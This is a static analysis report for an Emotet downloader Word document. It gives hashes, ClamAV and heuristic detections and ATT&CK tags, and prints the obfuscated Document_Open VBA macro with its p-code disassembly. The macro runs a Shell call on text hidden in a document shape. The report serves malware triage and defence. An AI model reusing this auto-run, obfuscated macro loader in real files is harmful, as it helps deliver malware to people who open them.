Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 8560ed53158f7c2f…

MALICIOUS

Office (OLE)

82.4 KB Created: 2018-11-05 17:18:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: f8254ac8ef2653d46a8ca33dc79ca256 SHA-1: 35a8d4fd89069e4e0ad66103b2f101b49d81c150 SHA-256: 8560ed53158f7c2f7931ee6e95abcbf0325d117b039d96f9ebc2e7971c22a151
212 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.001 PowerShell T1059.003 Windows Command Shell T1566.001 Spearphishing Attachment

The sample contains a Document_Open VBA macro that executes obfuscated PowerShell commands. These commands are designed to download and execute a second-stage payload. The ClamAV detection and the presence of PowerShell and cmd.exe invocation heuristics strongly indicate this is a downloader, likely associated with the Emotet family.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-6826494-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6826494-0
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_open()
   Dim UMOAW(3)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14157 bytes
SHA-256: 92379ba5b9cb6758b73682f2f3ed51af26cf0456c1d8a25aea15616e91dfcf38
Detection
ClamAV: No threats found
Obfuscation or payload: likely
188 of 256 identifiers look randomly generated (e.g. 'quwndWNwdkXSlSffSPURcoP') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "GAhESna"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   Dim UMOAW(3)
UMOAW(0) = InStrRev(pEitf + RjfvDbazaWTJKJiirouOXKB + DbwpLTl, JQYjWQod + rjZwBzdWVHlCuUihIqZI + cJISia) / InStrRev(UBwdf + iQOfhYNpcvJvuqRXYnVlsv + hhARpjo, LcHzOUW + QwNijYtWFNiVvfIlLG + UQFwc)
UMOAW(1) = InStrRev(SwvJf + DzcXhNMvpsnEiicprsOd + jMmOjL, jcLJn + XIUQDobHOQhpoTzHwB + LimiXGAb) * InStrRev(bUktN + QkfzSiPJnsJjaMImQGv + nZcNC, FbihQSzt + zNSIRLPuZkbHVYMtBBf + mhBsvHMP) + InStr(GhDwVOww + JdUJNtlzzVZVjJlTmN + NPmMarfC, LjJNsf + bQoXmrclENiVzGtaoSuUv + fpMWRGYX) / InStrRev(Aqdvi + apYBLUHwEGvhvpMoQP + GzNjn, fFVouF + TvrOSBRcJGkniqniSEwK + iZBasBoL)
UMOAW(2) = InStrRev(sYAUFoVI + fcwLowGaqUkKXQBMISZt + IpSdi, lzLFcpmu + lDYIOccXTwROGJfIot + izKLi) + InStrRev(PROBnqR + MjAGOtTlWVfGmputJER + wDiDNSs, lvFtpt + ZFHiuJfiwvXjiYJLOQXn + OUqBdzB) + InStrRev(iLzzBuz + TzRiwzafiVPBSjooGAztP + khaHQ, oTjPjY + JTTmOdsAVGKpiCclPt + RGvMwz) / InStrRev(Pwjrfacq + NamKEfFzNDnajOvTQtVSVq + rpdam, fUlHBP + VTwcXAcjvXQzsHsWOKwn + CAuKtfD)
   Dim SKZJU(4)
SKZJU(0) = InStr(CiYoq + wjTUiPLSudXIShdGlKsw + NrUffzzF, IaLSdzG + fzDnOQqkGODmRXvfmvi + rfrWLd) * InStrRev(ARrvJ + PpoPwcVdjBFBjBfnw + UzGSKD, hHUpQ + OSlPJmKXmcvPWHXpVoI + ZAYCtl)
SKZJU(1) = InStrRev(HcnNB + MhpifhmQRkMcTFlSpJ + QmaSnGC, awdnwa + RNHkIZtfJhbjrPZwEPTjOP + UwoUfkj) * InStrRev(jzHNjjHw + ljiGqZdWzjtUsnZoCqCSTqz + XjMjtpi, qzuBnKa + fOaHwQIRiQPQsHulzAfOkow + ADsrEDSD) - InStrRev(jvbbFv + aFmGOURnAApSAWjqYKMa + JGpVYZS, VoHuoY + QRDTzjYNZFMMNUFOzwOb + AiiGWrSW) + InStrRev(IBSLWQHN + mFIJZZJDqBqVdqHoin + QWjCtrio, UDvWYjz + SjvRjPSaAZQZvntWpSUCA + ZBhRa)
SKZJU(2) = InStrRev(fYIVEAO + IobLuIflnaRpzDiONkIZi + XIVjtILt, YDHRWC + QJpaiaBVQozOtVzkCuRGw + WzXwqi) + InStr(SjEwivh + uENwfIjAsdswpNDBwCaF + apunrOU, LrYSr + PqqztTLHRrjZFqWEtNtId + prCRvM) + InStrRev(mkPXiGM + aWozDrrvmYBWhMilJqVf + SkkSozji, GVYmzKj + MiQDChcaZpFIkHHPGpr + wFUzs) - InStr(HVGiHChh + VGFXdPcBsCTsjGEwNL + ZijkJBha, dTkRmVp + quwndWNwdkXSlSffSPURcoP + uTiGUct)
SKZJU(3) = InStrRev(uFOwFlz + KiSlwKaTWcUzcAcui + sYCtoQVJ, njFiSJ + vuJXRvsHUFLEUpu + nuEJm) / InStrRev(SIYKrHo + jVGuwIBEbRcckaRSBpz + bdkjK, OcwnU + FslCFLqFXjmQpVjSwTULZrp + zjwXk) - InStrRev(aQntZ + nMDXzLwdFkqVlhQlmFJ + CfivP, LdzhwWTr + CCrntatFbcndluVSj + zRZNYDi) / InStrRev(YWaDGjVI + CKDLXhDNbzYiOaOfrW + kERGMW, MDcuWu + QrAVNznMhCJHdruTHFqU + CkVFT)
   Dim Pjrqnd(1)
Pjrqnd(0) = InStr(dfvMRMh + rSmYnrPhNzPwHWHFP + DSLlNiU, YVDBzXa + zaGPvbGwFubOQPTMC + vfhYt) / InStr(zjwfsQ + nXzKHjGawupkNZDqf + WSdhwVw, LwwbwNs + fYHbzJRjjFpZltjjZkt + NisnG)
   Dim wZOoI(1)
wZOoI(0) = InStrRev(EiOna + VoItsWjfsUzhZUGDsIr + OzEuJ, cMioFWJR + StVUIhjOujXvDFislcWc + mzkauKpw) + InStrRev(zjjFSXWv + ERiLVQYTAvRZbwzTjrYj + zVZaNGb, nVVZFdf + OujJIjkYbYYjlQvFwFtU + nBMXsqEa) + InStrRev(TzqNqp + AvHHjEuiZSZUZjiYEjlU + UwfjiPIT, CljRHd + iITwuZsIQiBKTPIOCz + GIFhi) + InStrRev(RaXcqo + CPGpHsLFbbMCwITzMo + vDrwHdm, zrFzwK + VzAFDcSMQUXoOjKmPtd + sFNLtP)
Const zkkHRPiZr = 936378522 - 936378522
Shell@ Shapes(1).TextFrame.TextRange.Text + BQABbuT + hpOUtlKC, zkkHRPiZr
   Dim lcHFZZ(2)
lcHFZZ(0) = InStrRev(KwvQwB + jfCGCFOkLZizmXwaRXw + rzNzE, HskqU + tfNXuzfPXzZbVTihwPE + juzRqO) * InStrRev(OOFuDAD + LipAfOjWRInpnzqANip + ULisjSS, qDWDOBXl + znrDVPDJDWXNjUsWzE + qUpTklp)
lcHFZZ(1) = InStr(wVDocHI + OIbaShphhfPlOzifwWS + tbAiYDM, aqpCPBIi + IwNLHfaZcfoAjrjKRi + UKYJHmjX) * InStrRev(OMijPta + mGOXuBBKcUdZnzjuXot + ahcVzc, XBiqGmd + DWvzzZioOJjWoAzNYj + okFYEJl)
   Dim hLbomP(4)
hLbomP(0) = InStrRev(QRzLZk + JlsdGMMfDujUwjLRWZbN + jDCuWQ, EcZKtpUw + jVatTjONSBOhYGJKlhmQ + TIaqWz) + InStrRev(qiQvnjT + DMuqvAEkLoLEwFAbnkrVd + tqNmZrFm, pZYHW + lkSmiEKjrsrRFEH + cmwGRM)
hLbomP(1) = InStr(DbURi + tSFLfIczMbXMXUUjiwnL + JEGIXb, HXmwwiO + ztqppdjHIuGlGHVEVhbluw + hVDZU) / InStrRev(pSdjU + ADSlVVfOGNKiHwskdB + iabjQo, BdzhY + bjiCHMKznUKhnVOlkLtmA + zLjfh)
hLbomP(2) = InStrRev(nRAuwiUV + vwdaVRfSmiwiwizBdUG + tWjDWk, vRrEMj + ABPJHqjEmdVTmYIjzicHh + BQFdzU) - InStrRev(cTqNO + irjGvvJKfEAbKhnopSzin + LJnwKudM, YbaXrGD + TwzEaJZaUfIvwzWDUKW + nUGNQ)
hLbomP(3) = InStrRev(vktpB + MpkUQYccidnrjkzhrRFC + PIjXC, WvJNkqGW + sbkcGvHIsUVnYKAjpEa + Qvamsuq) / InStrRev(GNabj + nQtNaBIaLfGnRECMK + OOCKK, MwdrCCoj + PnXLjjXSAvWwfiBfK + bIOPCOkp) - InStrRev(uvwXdzh + nsjwpXtXYmBZMPzRMVm + KcdXaBj, sdwuKYs + NRikuFKNAQnzwnNukS + TVGNaRFY) + InStr(AYLFah + QnjDscjwWLwICLOosws + qUwcCqN, kChLPd + rTiNbKwmuLtfDXNXzAj + fbXzK)
End Sub


' Processing file: /tmp/qstore_i4edlvji
' ===============================================================================
' Module streams:
' Macros/VBA/GAhESna - 7801 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_open())
' Line #1:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0003 
' 	VarDefn UMOAW
' Line #2:
' 	Ld pEitf 
' 	Ld RjfvDbazaWTJKJiirouOXKB 
' 	Add 
' 	Ld DbwpLTl 
' 	Add 
' 	Ld JQYjWQod 
' 	Ld rjZwBzdWVHlCuUihIqZI 
' 	Add 
' 	Ld cJISia 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld UBwdf 
' 	Ld iQOfhYNpcvJvuqRXYnVlsv 
' 	Add 
' 	Ld hhARpjo 
' 	Add 
' 	Ld LcHzOUW 
' 	Ld QwNijYtWFNiVvfIlLG 
' 	Add 
' 	Ld UQFwc 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Div 
' 	LitDI2 0x0000 
' 	ArgsSt UMOAW 0x0001 
' Line #3:
' 	Ld SwvJf 
' 	Ld DzcXhNMvpsnEiicprsOd 
' 	Add 
' 	Ld jMmOjL 
' 	Add 
' 	Ld jcLJn 
' 	Ld XIUQDobHOQhpoTzHwB 
' 	Add 
' 	Ld LimiXGAb 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld bUktN 
' 	Ld QkfzSiPJnsJjaMImQGv 
' 	Add 
' 	Ld nZcNC 
' 	Add 
' 	Ld FbihQSzt 
' 	Ld zNSIRLPuZkbHVYMtBBf 
' 	Add 
' 	Ld mhBsvHMP 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	Ld GhDwVOww 
' 	Ld JdUJNtlzzVZVjJlTmN 
' 	Add 
' 	Ld NPmMarfC 
' 	Add 
' 	Ld LjJNsf 
' 	Ld bQoXmrclENiVzGtaoSuUv 
' 	Add 
' 	Ld fpMWRGYX 
' 	Add 
' 	FnInStr 
' 	Ld Aqdvi 
' 	Ld apYBLUHwEGvhvpMoQP 
' 	Add 
' 	Ld GzNjn 
' 	Add 
' 	Ld fFVouF 
' 	Ld TvrOSBRcJGkniqniSEwK 
' 	Add 
' 	Ld iZBasBoL 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Div 
' 	Add 
' 	LitDI2 0x0001 
' 	ArgsSt UMOAW 0x0001 
' Line #4:
' 	Ld sYAUFoVI 
' 	Ld fcwLowGaqUkKXQBMISZt 
' 	Add 
' 	Ld IpSdi 
' 	Add 
' 	Ld lzLFcpmu 
' 	Ld lDYIOccXTwROGJfIot 
' 	Add 
' 	Ld izKLi 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld PROBnqR 
' 	Ld MjAGOtTlWVfGmputJER 
' 	Add 
' 	Ld wDiDNSs 
' 	Add 
' 	Ld lvFtpt 
' 	Ld ZFHiuJfiwvXjiYJLOQXn 
' 	Add 
' 	Ld OUqBdzB 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	Ld iLzzBuz 
' 	Ld TzRiwzafiVPBSjooGAztP 
' 	Add 
' 	Ld khaHQ 
' 	Add 
' 	Ld oTjPjY 
' 	Ld JTTmOdsAVGKpiCclPt 
' 	Add 
' 	Ld RGvMwz 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld Pwjrfacq 
' 	Ld NamKEfFzNDnajOvTQtVSVq 
' 	Add 
' 	Ld rpdam 
' 	Add 
' 	Ld fUlHBP 
' 	Ld VTwcXAcjvXQzsHsWOKwn 
' 	Add 
' 	Ld CAuKtfD 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Div 
' 	Add 
' 	LitDI2 0x0002 
' 	ArgsSt UMOAW 0x0001 
' Line #5:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0004 
' 	VarDefn SKZJU
' Line #6:
' 	Ld CiYoq 
' 	Ld wjTUiPLSudXIShdGlKsw 
' 	Add 
' 	Ld NrUffzzF 
' 	Add 
' 	Ld IaLSdzG 
' 	Ld fzDnOQqkGODmRXvfmvi 
' 	Add 
' 	Ld rfrWLd 
' 	Add 
' 	FnInStr 
' 	Ld ARrvJ 
' 	Ld PpoPwcVdjBFBjBfnw 
' 	Add 
' 	Ld UzGSKD 
' 	Add 
' 	Ld hHUpQ 
' 	Ld OSlPJmKXmcvPWHXpVoI 
' 	Add 
' 	Ld ZAYCtl 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	LitDI2 0x0000 
' 	ArgsSt SKZJU 0x0001 
' Line #7:
' 	Ld HcnNB 
' 	Ld MhpifhmQRkMcTFlSpJ 
' 	Add 
' 	Ld QmaSnGC 
' 	Add 
' 	Ld awdnwa 
' 	Ld RNHkIZtfJhbjrPZwEPTjOP 
' 	Add 
' 	Ld UwoUfkj 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld jzHNjjHw 
' 	Ld ljiGqZdWzjtUsnZoCqCSTqz 
' 	Add 
' 	Ld XjMjtpi 
' 	Add 
' 	Ld qzuBnKa 
' 	Ld fOaHwQIRiQPQsHulzAfOkow 
' 	Add 
' 	Ld ADsrEDSD 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	Ld jvbbFv 
' 	Ld aFmGOURnAApSAWjqYKMa 
' 	Add 
' 	Ld JGpVYZS 
' 	Add 
' 	Ld VoHuoY 
' 	Ld QRDTzjYNZFMMNUFOzwOb 
' 	Add 
' 	Ld AiiGWrSW 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Sub 
' 	Ld IBSLWQHN 
' 	Ld mFIJZZJDqBqVdqHoin 
' 	Add 
' 	Ld QWjCtrio 
' 	Add 
' 	Ld UDvWYjz 
' 	Ld SjvRjPSaAZQZvntWpSUCA 
' 	Add 
' 	Ld ZBhRa 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	LitDI2 0x0001 
' 	ArgsSt SKZJU 0x0001 
' Line #8:
' 	Ld fYIVEAO 
' 	Ld IobLuIflnaRpzDiONkIZi 
' 	Add 
' 	Ld XIVjtILt 
' 	Add 
' 	Ld YDHRWC 
' 	Ld QJpaiaBVQozOtVzkCuRGw 
' 	Add 
' 	Ld WzXwqi 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld SjEwivh 
' 	Ld uENwfIjAsdswpNDBwCaF 
' 	Add 
' 	Ld apunrOU 
' 	Add 
' 	Ld LrYSr 
' 	Ld PqqztTLHRrjZFqWEtNtId 
' 	Add 
' 	Ld prCRvM 
' 	Add 
' 	FnInStr 
' 	Add 
' 	Ld mkPXiGM 
' 	Ld aWozDrrvmYBWhMilJqVf 
' 	Add 
' 	Ld SkkSozji 
' 	Add 
' 	Ld GVYmzKj 
' 	Ld MiQDChcaZpFIkHHPGpr 
' 	Add 
' 	Ld wFUzs 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	Ld HVGiHChh 
' 	Ld VGFXdPcBsCTsjGEwNL 
' 	Add 
' 	Ld ZijkJBha 
' 	Add 
' 	Ld dTkRmVp 
' 	Ld quwndWNwdkXSlSffSPURcoP 
' 	Add 
' 	Ld uTiGUct 
' 	Add 
' 	FnInStr 
' 	Sub 
' 	LitDI2 0x0002 
' 	ArgsSt SKZJU 0x0001 
' Line #9:
' 	Ld uFOwFlz 
' 	Ld KiSlwKaTWcUzcAcui 
' 	Add 
' 	Ld sYCtoQVJ 
' 	Add 
' 	Ld njFiSJ 
' 	Ld vuJXRvsHUFLEUpu 
' 	Add 
' 	Ld nuEJm 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld SIYKrHo 
' 	Ld jVGuwIBEbRcckaRSBpz 
' 	Add 
' 	Ld bdkjK 
' 	Add 
' 	Ld OcwnU 
' 	Ld FslCFLqFXjmQpVjSwTULZrp 
' 	Add 
' 	Ld zjwXk 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Div 
' 	Ld aQntZ 
' 	Ld nMDXzLwdFkqVlhQlmFJ 
' 	Add 
' 	Ld CfivP 
' 	Add 
' 	Ld LdzhwWTr 
' 	Ld CCrntatFbcndluVSj 
' 	Add 
' 	Ld zRZNYDi 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld YWaDGjVI 
' 	Ld CKDLXhDNbzYiOaOfrW 
' 	Add 
' 	Ld kERGMW 
' 	Add 
' 	Ld MDcuWu 
' 	Ld QrAVNznMhCJHdruTHFqU 
' 	Add 
' 	Ld CkVFT 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Div 
' 	Sub 
' 	LitDI2 0x0003 
' 	ArgsSt SKZJU 0x0001 
' Line #10:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0001 
' 	VarDefn Pjrqnd
' Line #11:
' 	Ld dfvMRMh 
' 	Ld rSmYnrPhNzPwHWHFP 
' 	Add 
' 	Ld DSLlNiU 
' 	Add 
' 	Ld YVDBzXa 
' 	Ld zaGPvbGwFubOQPTMC 
' 	Add 
' 	Ld vfhYt 
' 	Add 
' 	FnInStr 
' 	Ld zjwfsQ 
' 	Ld nXzKHjGawupkNZDqf 
' 	Add 
' 	Ld WSdhwVw 
' 	Add 
' 	Ld LwwbwNs 
' 	Ld fYHbzJRjjFpZltjjZkt 
' 	Add 
' 	Ld NisnG 
' 	Add 
' 	FnInStr 
' 	Div 
' 	LitDI2 0x0000 
' 	ArgsSt Pjrqnd 0x0001 
' Line #12:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0001 
' 	VarDefn wZOoI
' Line #13:
' 	Ld EiOna 
' 	Ld VoItsWjfsUzhZUGDsIr 
' 	Add 
' 	Ld OzEuJ 
' 	Add 
' 	Ld cMioFWJR 
' 	Ld StVUIhjOujXvDFislcWc 
' 	Add 
' 	Ld mzkauKpw 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld zjjFSXWv 
' 	Ld ERiLVQYTAvRZbwzTjrYj 
' 	Add 
' 	Ld zVZaNGb 
' 	Add 
' 	Ld nVVZFdf 
' 	Ld OujJIjkYbYYjlQvFwFtU 
' 	Add 
' 	Ld nBMXsqEa 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	Ld nBMXsqEa 
' 	Ld TzqNqp 
' 	Add 
' 	Ld AvHHjEuiZSZUZjiYEjlU 
' 	Add 
' 	Ld UwfjiPIT 
' 	Ld CljRHd 
' 	Add 
' 	Ld iITwuZsIQiBKTPIOCz 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	Ld GIFhi 
' 	Ld RaXcqo 
' 	Add 
' 	Ld CPGpHsLFbbMCwITzMo 
' 	Add 
' 	Ld vDrwHdm 
' 	Ld zrFzwK 
' 	Add 
' 	Ld VzAFDcSMQUXoOjKmPtd 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	LitDI2 0x0000 
' 	ArgsSt wZOoI 0x0001 
' Line #14:
' 	Dim (Const) 
' 	LitDI4 0x009A 0x37D0 
' 	LitDI4 0x009A 0x37D0 
' 	Sub 
' 	VarDefn sFNLtP
' Line #15:
' 	LitDI2 0x0001 
' 	ArgsLd Shell 0x0001 
' 	MemLd Shapes 
' 	MemLd TextFrame 
' 	MemLd Text 
' 	Ld TextRange 
' 	Add 
' 	Ld BQABbuT 
' 	Add 
' 	Ld sFNLtP 
' 	ArgsCall zkkHRPiZr@ 0x0002 
' Line #16:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0002 
' 	VarDefn hpOUtlKC
' Line #17:
' 	Ld lcHFZZ 
' 	Ld KwvQwB 
' 	Add 
' 	Ld jfCGCFOkLZizmXwaRXw 
' 	Add 
' 	Ld rzNzE 
' 	Ld HskqU 
' 	Add 
' 	Ld tfNXuzfPXzZbVTihwPE 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld juzRqO 
' 	Ld OOFuDAD 
' 	Add 
' 	Ld LipAfOjWRInpnzqANip 
' 	Add 
' 	Ld ULisjSS 
' 	Ld qDWDOBXl 
' 	Add 
' 	Ld znrDVPDJDWXNjUsWzE 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	LitDI2 0x0000 
' 	ArgsSt hpOUtlKC 0x0001 
' Line #18:
' 	Ld qUpTklp 
' 	Ld wVDocHI 
' 	Add 
' 	Ld OIbaShphhfPlOzifwWS 
' 	Add 
' 	Ld tbAiYDM 
' 	Ld aqpCPBIi 
' 	Add 
' 	Ld IwNLHfaZcfoAjrjKRi 
' 	Add 
' 	FnInStr 
' 	Ld UKYJHmjX 
' 	Ld OMijPta 
' 	Add 
' 	Ld mGOXuBBKcUdZnzjuXot 
' 	Add 
' 	Ld ahcVzc 
' 	Ld XBiqGmd 
' 	Add 
' 	Ld DWvzzZioOJjWoAzNYj 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Mul 
' 	LitDI2 0x0001 
' 	ArgsSt hpOUtlKC 0x0001 
' Line #19:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0004 
' 	VarDefn okFYEJl
' Line #20:
' 	Ld hLbomP 
' 	Ld QRzLZk 
' 	Add 
' 	Ld JlsdGMMfDujUwjLRWZbN 
' 	Add 
' 	Ld jDCuWQ 
' 	Ld EcZKtpUw 
' 	Add 
' 	Ld jVatTjONSBOhYGJKlhmQ 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld TIaqWz 
' 	Ld qiQvnjT 
' 	Add 
' 	Ld DMuqvAEkLoLEwFAbnkrVd 
' 	Add 
' 	Ld tqNmZrFm 
' 	Ld pZYHW 
' 	Add 
' 	Ld lkSmiEKjrsrRFEH 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Add 
' 	LitDI2 0x0000 
' 	ArgsSt okFYEJl 0x0001 
' Line #21:
' 	Ld cmwGRM 
' 	Ld DbURi 
' 	Add 
' 	Ld tSFLfIczMbXMXUUjiwnL 
' 	Add 
' 	Ld JEGIXb 
' 	Ld HXmwwiO 
' 	Add 
' 	Ld ztqppdjHIuGlGHVEVhbluw 
' 	Add 
' 	FnInStr 
' 	Ld hVDZU 
' 	Ld pSdjU 
' 	Add 
' 	Ld ADSlVVfOGNKiHwskdB 
' 	Add 
' 	Ld iabjQo 
' 	Ld BdzhY 
' 	Add 
' 	Ld bjiCHMKznUKhnVOlkLtmA 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Div 
' 	LitDI2 0x0001 
' 	ArgsSt okFYEJl 0x0001 
' Line #22:
' 	Ld zLjfh 
' 	Ld nRAuwiUV 
' 	Add 
' 	Ld vwdaVRfSmiwiwizBdUG 
' 	Add 
' 	Ld tWjDWk 
' 	Ld vRrEMj 
' 	Add 
' 	Ld ABPJHqjEmdVTmYIjzicHh 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld BQFdzU 
' 	Ld cTqNO 
' 	Add 
' 	Ld irjGvvJKfEAbKhnopSzin 
' 	Add 
' 	Ld LJnwKudM 
' 	Ld YbaXrGD 
' 	Add 
' 	Ld TwzEaJZaUfIvwzWDUKW 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Sub 
' 	LitDI2 0x0002 
' 	ArgsSt okFYEJl 0x0001 
' Line #23:
' 	Ld nUGNQ 
' 	Ld vktpB 
' 	Add 
' 	Ld MpkUQYccidnrjkzhrRFC 
' 	Add 
' 	Ld PIjXC 
' 	Ld WvJNkqGW 
' 	Add 
' 	Ld sbkcGvHIsUVnYKAjpEa 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Ld Qvamsuq 
' 	Ld GNabj 
' 	Add 
' 	Ld nQtNaBIaLfGnRECMK 
' 	Add 
' 	Ld OOCKK 
' 	Ld MwdrCCoj 
' 	Add 
' 	Ld PnXLjjXSAvWwfiBfK 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Div 
' 	Ld bIOPCOkp 
' 	Ld uvwXdzh 
' 	Add 
' 	Ld nsjwpXtXYmBZMPzRMVm 
' 	Add 
' 	Ld KcdXaBj 
' 	Ld sdwuKYs 
' 	Add 
' 	Ld NRikuFKNAQnzwnNukS 
' 	Add 
' 	ArgsLd InStrRev 0x0002 
' 	Sub 
' 	Ld TVGNaRFY 
' 	Ld AYLFah 
' 	Add 
' 	Ld QnjDscjwWLwICLOosws 
' 	Add 
' 	Ld qUwcCqN 
' 	Ld kChLPd 
' 	Add 
' 	Ld rTiNbKwmuLtfDXNXzAj 
' 	Add 
' 	FnInStr 
' 	Add 
' 	LitDI2 0x0003 
' 	ArgsSt okFYEJl 0x0001 
' Line #24:
' 	EndSub 
' Line #25:

Open this report in the interactive analyzer, or submit your own file for analysis.